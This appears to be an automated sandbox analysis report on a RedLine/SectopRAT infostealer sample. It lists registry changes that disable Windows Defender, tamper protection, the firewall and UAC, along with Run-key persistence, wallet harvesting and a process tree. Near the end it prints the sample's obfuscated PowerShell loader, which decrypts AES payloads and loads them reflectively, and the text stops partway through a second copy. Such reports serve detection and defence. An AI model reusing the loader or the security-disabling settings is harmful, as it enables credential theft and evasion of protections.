redline | d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 7 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Modifies Windows Defender TamperProtection settings 3 TTPs 3 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	powershell.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	powershell.exe

Modifies firewall policy service 3 TTPs 2 IoCs

Modify Registry

Windows Service

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral2/memory/224-187-0x0000000007CD0000-0x0000000007CEE000-memory.dmp	family_redline

Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

resource	yara_rule
behavioral2/memory/224-187-0x0000000007CD0000-0x0000000007CEE000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat

UAC bypass 3 TTPs 1 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
5516	bcdedit.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
8	224	powershell.exe
19	224	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 40 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3396	powershell.exe
2272	powershell.exe
2972	powershell.exe
5948	powershell.exe
3628	powershell.exe
5628	powershell.exe
5728	powershell.exe
5532	powershell.exe
5920	powershell.exe
4424	powershell.exe
1416	powershell.exe
1496	powershell.exe
224	powershell.exe
4284	powershell.exe
5972	powershell.exe
5304	powershell.exe
2912	powershell.exe
3960	powershell.exe
3436	powershell.exe
4092	powershell.exe
624	powershell.exe
828	powershell.exe
6140	powershell.exe
5424	powershell.exe
2520	powershell.exe
656	powershell.exe
1916	powershell.exe
4300	powershell.exe
3744	powershell.exe
5808	powershell.exe
2892	powershell.exe
2440	powershell.exe
5072	powershell.exe
3172	powershell.exe
3944	powershell.exe
3556	powershell.exe
1932	powershell.exe
4384	powershell.exe
1932	powershell.exe
3628	powershell.exe

Disables Task Manager via registry modification
defense_evasion
Disables use of System Restore points 1 TTPs
defense_evasion

Inhibit System Recovery
T1490

Modifies Windows Firewall 2 TTPs 1 IoCs

Windows Service

Disable or Modify System Firewall

T1562.004

pid	Process
2856	netsh.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe

Executes dropped EXE 2 IoCs

pid	Process
2332	h2uasj3u.yo3.exe
5760	h2uasj3u.yo3.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 30 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\keygroup777.ru = "native.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsInstaller = "WindowsInstaller "	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\СОСИ ХУЙ ШЛЮХА! = "СОСИ ХУЙ ШЛЮХА!"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ХУЙ ШЛЮХА! = "ХУЙ ШЛЮХА!"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "System.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\crypt0rroot = "crypt0rroot.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\OneDrive10293 = "OneDrive10293"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhost = "taskhost.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\windowsx-c = "windowsx-c.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\System3264Wow = "System3264Wow"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\_default64 = "_default64.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\crypt0rroot = "crypt0rroot.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System3264Wow = "System3264Wow"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ХУЙ ШЛЮХА! = "ХУЙ ШЛЮХА!"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\windowsx-c = "windowsx-c.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\root-cryptor = "root-cryptor.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AWindowsService = "AWindowsService.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\root-cryptor = "root-cryptor.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\MSEdgeUpdateX = "MSEdgeUpdateX"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\AWindowsService = "AWindowsService.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSEdgeUpdateX = "MSEdgeUpdateX"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive10293 = "OneDrive10293"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\WINDOWS = "WINDOWS"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\System = "System.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\WindowsInstaller = "WindowsInstaller "	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\СОСИ ХУЙ ШЛЮХА! = "СОСИ ХУЙ ШЛЮХА!"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\taskhost = "taskhost.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\keygroup777.ru = "native.exe"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WINDOWS = "WINDOWS"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\_default64 = "_default64.exe"	powershell.exe

Indicator Removal: Clear Persistence 1 TTPs 5 IoCs

Clear artifacts associated with previously established persistence like scheduletasks on a host.

persistence privilege_escalation

Clear Persistence

T1070.009

pid	Process
3600	cmd.exe
2980	cmd.exe
216	cmd.exe
2836	cmd.exe
4312	cmd.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

Launches sc.exe 3 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
216	sc.exe
1568	sc.exe
4696	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OneDriveSetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OneDriveSetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OneDriveSetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe

Kills process with taskkill 9 IoCs

pid	Process
5512	taskkill.exe
3040	taskkill.exe
1120	taskkill.exe
5256	taskkill.exe
5060	taskkill.exe
6136	taskkill.exe
5224	taskkill.exe
3400	taskkill.exe
6088	taskkill.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

pid	Process
5824	reg.exe
5820	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
2744	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5728	powershell.exe
5728	powershell.exe
5532	powershell.exe
5532	powershell.exe
5920	powershell.exe
5920	powershell.exe
4424	powershell.exe
1416	powershell.exe
4424	powershell.exe
1416	powershell.exe
3396	powershell.exe
3396	powershell.exe
1496	powershell.exe
1496	powershell.exe
2272	powershell.exe
2272	powershell.exe
2972	powershell.exe
2972	powershell.exe
224	powershell.exe
4284	powershell.exe
4284	powershell.exe
224	powershell.exe
5948	powershell.exe
5948	powershell.exe
3628	powershell.exe
3628	powershell.exe
5628	powershell.exe
5628	powershell.exe
224	powershell.exe
224	powershell.exe
5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe
5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe
624	powershell.exe
624	powershell.exe
828	powershell.exe
828	powershell.exe
5072	powershell.exe
5072	powershell.exe
3172	powershell.exe
3172	powershell.exe
4384	powershell.exe
1932	powershell.exe
4384	powershell.exe
1932	powershell.exe
3944	powershell.exe
3944	powershell.exe
5972	powershell.exe
5972	powershell.exe
3744	powershell.exe
3744	powershell.exe
5808	powershell.exe
5808	powershell.exe
6140	powershell.exe
6140	powershell.exe
5304	powershell.exe
5304	powershell.exe
5424	powershell.exe
5424	powershell.exe
2520	powershell.exe
2520	powershell.exe
2912	powershell.exe
2912	powershell.exe
3960	powershell.exe
656	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5728	powershell.exe
Token: SeDebugPrivilege	5532	powershell.exe
Token: SeDebugPrivilege	5920	powershell.exe
Token: SeDebugPrivilege	4424	powershell.exe
Token: SeDebugPrivilege	1416	powershell.exe
Token: SeDebugPrivilege	3396	powershell.exe
Token: SeDebugPrivilege	1496	powershell.exe
Token: SeDebugPrivilege	2272	powershell.exe
Token: SeDebugPrivilege	2972	powershell.exe
Token: SeDebugPrivilege	224	powershell.exe
Token: SeDebugPrivilege	4284	powershell.exe
Token: SeDebugPrivilege	5948	powershell.exe
Token: SeDebugPrivilege	3628	powershell.exe
Token: SeDebugPrivilege	5628	powershell.exe
Token: SeDebugPrivilege	5256	taskkill.exe
Token: SeDebugPrivilege	5060	taskkill.exe
Token: SeDebugPrivilege	6136	taskkill.exe
Token: SeDebugPrivilege	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe
Token: SeDebugPrivilege	6088	taskkill.exe
Token: SeDebugPrivilege	5224	taskkill.exe
Token: SeDebugPrivilege	3400	taskkill.exe
Token: SeDebugPrivilege	5512	taskkill.exe
Token: SeDebugPrivilege	3040	taskkill.exe
Token: SeDebugPrivilege	624	powershell.exe
Token: SeDebugPrivilege	828	powershell.exe
Token: SeDebugPrivilege	5072	powershell.exe
Token: SeDebugPrivilege	3172	powershell.exe
Token: SeDebugPrivilege	4384	powershell.exe
Token: SeDebugPrivilege	1932	powershell.exe
Token: SeDebugPrivilege	3944	powershell.exe
Token: SeDebugPrivilege	5972	powershell.exe
Token: SeDebugPrivilege	3744	powershell.exe
Token: SeDebugPrivilege	5808	powershell.exe
Token: SeDebugPrivilege	6140	powershell.exe
Token: SeDebugPrivilege	5304	powershell.exe
Token: SeDebugPrivilege	5424	powershell.exe
Token: SeIncreaseQuotaPrivilege	5304	powershell.exe
Token: SeSecurityPrivilege	5304	powershell.exe
Token: SeTakeOwnershipPrivilege	5304	powershell.exe
Token: SeLoadDriverPrivilege	5304	powershell.exe
Token: SeSystemProfilePrivilege	5304	powershell.exe
Token: SeSystemtimePrivilege	5304	powershell.exe
Token: SeProfSingleProcessPrivilege	5304	powershell.exe
Token: SeIncBasePriorityPrivilege	5304	powershell.exe
Token: SeCreatePagefilePrivilege	5304	powershell.exe
Token: SeBackupPrivilege	5304	powershell.exe
Token: SeRestorePrivilege	5304	powershell.exe
Token: SeShutdownPrivilege	5304	powershell.exe
Token: SeDebugPrivilege	5304	powershell.exe
Token: SeSystemEnvironmentPrivilege	5304	powershell.exe
Token: SeRemoteShutdownPrivilege	5304	powershell.exe
Token: SeUndockPrivilege	5304	powershell.exe
Token: SeManageVolumePrivilege	5304	powershell.exe
Token: 33	5304	powershell.exe
Token: 34	5304	powershell.exe
Token: 35	5304	powershell.exe
Token: 36	5304	powershell.exe
Token: SeDebugPrivilege	2520	powershell.exe
Token: SeDebugPrivilege	2912	powershell.exe
Token: SeDebugPrivilege	1120	taskkill.exe
Token: SeDebugPrivilege	3960	powershell.exe
Token: SeDebugPrivilege	656	powershell.exe
Token: SeDebugPrivilege	3436	powershell.exe
Token: SeDebugPrivilege	1916	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5136 wrote to memory of 1472	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	85
PID 5136 wrote to memory of 1472	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	85
PID 5136 wrote to memory of 6132	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	87
PID 5136 wrote to memory of 6132	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	87
PID 5136 wrote to memory of 5728	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	88
PID 5136 wrote to memory of 5728	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	88
PID 5136 wrote to memory of 5532	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	91
PID 5136 wrote to memory of 5532	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	91
PID 5136 wrote to memory of 5920	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	93
PID 5136 wrote to memory of 5920	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	93
PID 5136 wrote to memory of 4424	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	95
PID 5136 wrote to memory of 4424	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	95
PID 6132 wrote to memory of 4032	6132	cmd.exe	97
PID 6132 wrote to memory of 4032	6132	cmd.exe	97
PID 6132 wrote to memory of 1416	6132	cmd.exe	98
PID 6132 wrote to memory of 1416	6132	cmd.exe	98
PID 5136 wrote to memory of 3396	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	99
PID 5136 wrote to memory of 3396	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	99
PID 5136 wrote to memory of 1496	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	101
PID 5136 wrote to memory of 1496	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	101
PID 1472 wrote to memory of 216	1472	cmd.exe	103
PID 1472 wrote to memory of 216	1472	cmd.exe	103
PID 5136 wrote to memory of 2272	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	104
PID 5136 wrote to memory of 2272	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	104
PID 1472 wrote to memory of 224	1472	cmd.exe	105
PID 1472 wrote to memory of 224	1472	cmd.exe	105
PID 1472 wrote to memory of 224	1472	cmd.exe	105
PID 5136 wrote to memory of 2972	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	108
PID 5136 wrote to memory of 2972	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	108
PID 5136 wrote to memory of 4284	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	110
PID 5136 wrote to memory of 4284	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	110
PID 5136 wrote to memory of 5948	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	113
PID 5136 wrote to memory of 5948	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	113
PID 5136 wrote to memory of 3628	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	115
PID 5136 wrote to memory of 3628	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	115
PID 5136 wrote to memory of 5628	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	117
PID 5136 wrote to memory of 5628	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	117
PID 5136 wrote to memory of 2744	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	119
PID 5136 wrote to memory of 2744	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	119
PID 5136 wrote to memory of 1348	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	130
PID 5136 wrote to memory of 1348	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	130
PID 5136 wrote to memory of 4352	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	132
PID 5136 wrote to memory of 4352	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	132
PID 1348 wrote to memory of 5256	1348	cmd.exe	134
PID 1348 wrote to memory of 5256	1348	cmd.exe	134
PID 4352 wrote to memory of 5060	4352	cmd.exe	135
PID 4352 wrote to memory of 5060	4352	cmd.exe	135
PID 5136 wrote to memory of 5520	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	137
PID 5136 wrote to memory of 5520	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	137
PID 5136 wrote to memory of 6096	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	139
PID 5136 wrote to memory of 6096	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	139
PID 5520 wrote to memory of 6136	5520	cmd.exe	141
PID 5520 wrote to memory of 6136	5520	cmd.exe	141
PID 6096 wrote to memory of 6088	6096	cmd.exe	142
PID 6096 wrote to memory of 6088	6096	cmd.exe	142
PID 5136 wrote to memory of 5224	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	143
PID 5136 wrote to memory of 5224	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	143
PID 5136 wrote to memory of 3400	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	145
PID 5136 wrote to memory of 3400	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	145
PID 5136 wrote to memory of 4712	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	147
PID 5136 wrote to memory of 4712	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	147
PID 5136 wrote to memory of 2028	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	148
PID 5136 wrote to memory of 2028	5136	d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe	148
PID 2028 wrote to memory of 5512	2028	cmd.exe	151

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe
"C:\Users\Admin\AppData\Local\Temp\d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\cqxwsvrp.vd1.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mLV7KrO3wLHHAAm4GaaFGgjj/GUAMMVOaPh3FGpoUZs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BMXXbGgs1mALdsCSxvMtpA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZWVZX=New-Object System.IO.MemoryStream(,$param_var); $Tupqk=New-Object System.IO.MemoryStream; $pEVyq=New-Object System.IO.Compression.GZipStream($ZWVZX, [IO.Compression.CompressionMode]::Decompress); $pEVyq.CopyTo($Tupqk); $pEVyq.Dispose(); $ZWVZX.Dispose(); $Tupqk.Dispose(); $Tupqk.ToArray();}function execute_function($param_var,$param2_var){ $YwxMS=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ALVCG=$YwxMS.EntryPoint; $ALVCG.Invoke($null, $param2_var);}$bwlKi = 'C:\cqxwsvrp.vd1.bat';$host.UI.RawUI.WindowTitle = $bwlKi;$NiVuC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bwlKi).Split([Environment]::NewLine);foreach ($OBjYH in $NiVuC) { if ($OBjYH.StartsWith('EiQdPpTgEPKAUuFHgbxm')) { $JPYHw=$OBjYH.Substring(20); break; }}$payloads_var=[string[]]$JPYHw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:216
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:224
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\0uqhlpmx.pkq.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:6132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PEylQItydp6DF2KLKsDsMrVgiK6Anhs4Yd2E90Yt80='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IfesP7NShxOIaefsOsYtLQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EgdKe=New-Object System.IO.MemoryStream(,$param_var); $IqEPB=New-Object System.IO.MemoryStream; $NGAHc=New-Object System.IO.Compression.GZipStream($EgdKe, [IO.Compression.CompressionMode]::Decompress); $NGAHc.CopyTo($IqEPB); $NGAHc.Dispose(); $EgdKe.Dispose(); $IqEPB.Dispose(); $IqEPB.ToArray();}function execute_function($param_var,$param2_var){ $TAWjc=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); 